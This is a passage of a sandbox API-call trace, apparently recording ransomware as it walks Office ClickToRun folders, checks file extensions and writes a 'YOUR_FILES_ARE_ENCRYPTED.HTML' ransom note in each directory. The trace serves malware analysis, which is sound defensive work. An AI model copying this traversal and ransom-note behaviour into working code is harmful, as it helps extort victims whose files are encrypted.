ftLastAccessTime.dwLowDateTime=0xcba0f1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba0f1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.585] FindNextFileW (in: 
hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="5DF8E020-832F-493E-A40D-17A803C0D548", cAlternateFileName="5DF8E0~1")) returned 1 [0169.585] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548") returned 80 [0169.585] GetProcessHeap () returned 0x270000 [0169.585] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.588] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548" [0169.588] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*" [0169.588] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.588] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.589] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0169.589] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16") returned 89 [0169.589] GetProcessHeap () returned 0x270000 [0169.589] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.590] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16" [0169.590] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*" [0169.590] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.590] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.591] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcad43ba0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5765, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D", cAlternateFileName="MASTER~1.7F1")) returned 1 [0169.591] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D") returned 181 [0169.591] lstrcmpW (lpString1="MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.591] PathFindExtensionW (pszPath="MasterDescriptor.en-us.xml.7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D") returned=".7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D" [0169.591] lstrlenW (lpString=".7F1EDB124DDB8FA5763530ADEE55A9840CBC11AA9C22DE01643978F07AC5D97D") returned 65 [0169.591] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x60, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) returned 1 [0169.591] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\s321033.hash") returned 102 [0169.591] lstrcmpW (lpString1="s321033.hash", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.591] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0169.591] lstrlenW (lpString=".hash") returned 5 [0169.591] PathFindExtensionW (pszPath="s321033.hash") 
returned=".hash" [0169.591] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26", cAlternateFileName="STREAM~1.95A")) returned 1 [0169.591] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26") returned 179 [0169.591] lstrcmpW (lpString1="stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.591] PathFindExtensionW (pszPath="stream.x86.en-us.man.dat.95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26") returned=".95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26" [0169.591] lstrlenW (lpString=".95A3B63F803AD7F8A4EBC90442E1802AC57768899BA6BEA3B832FF98690AAB26") returned 65 [0169.591] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcad8fe60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.591] 
wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.591] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.592] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcad8fe60, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcad8fe60, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcad8fe60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.592] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.592] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\en-us.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.592] GetProcessHeap () returned 0x270000 [0169.593] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.593] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0169.593] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16") returned 90 [0169.593] GetProcessHeap () returned 0x270000 [0169.593] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.593] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16" [0169.593] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*" [0169.593] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.593] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.593] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcadb5fc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5220, dwReserved0=0x0, dwReserved1=0x60, cFileName="MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05", cAlternateFileName="MASTER~1.75D")) returned 1 [0169.593] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05") returned 183 [0169.593] lstrcmpW (lpString1="MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.593] PathFindExtensionW (pszPath="MasterDescriptor.x-none.xml.75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05") returned=".75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05" [0169.593] lstrlenW 
(lpString=".75DB66124330D635E58D015B1CA35820E7BAB0B6F61C3E0FE6BD22E8A67F3C05") returned 65 [0169.593] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x60, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1 [0169.593] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\s320.hash") returned 100 [0169.594] lstrcmpW (lpString1="s320.hash", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.594] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0169.594] lstrlenW (lpString=".hash") returned 5 [0169.594] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0169.594] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A", cAlternateFileName="STREAM~1.766")) returned 1 [0169.594] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A") returned 181 [0169.594] lstrcmpW (lpString1="stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.594] PathFindExtensionW (pszPath="stream.x86.x-none.man.dat.7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A") returned=".7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A" [0169.594] lstrlenW (lpString=".7661DBF480A90BFF51B093232C90AFA3CA2A902200EA917B692DFC62223FF80A") returned 65 [0169.594] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcaddc120, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.594] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0169.594] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.594] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcaddc120, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, 
nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.594] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.594] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0169.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\x-none.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.594] GetProcessHeap () returned 0x270000 [0169.595] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.595] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcaddc120, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.595] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0169.595] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.595] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcaddc120, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcaddc120, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcaddc120, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.595] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.595] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0169.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.596] GetProcessHeap () returned 0x270000 [0169.596] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.596] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fc83790, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2fc83790, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcae02280, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x7b6, dwReserved0=0x0, dwReserved1=0x60, 
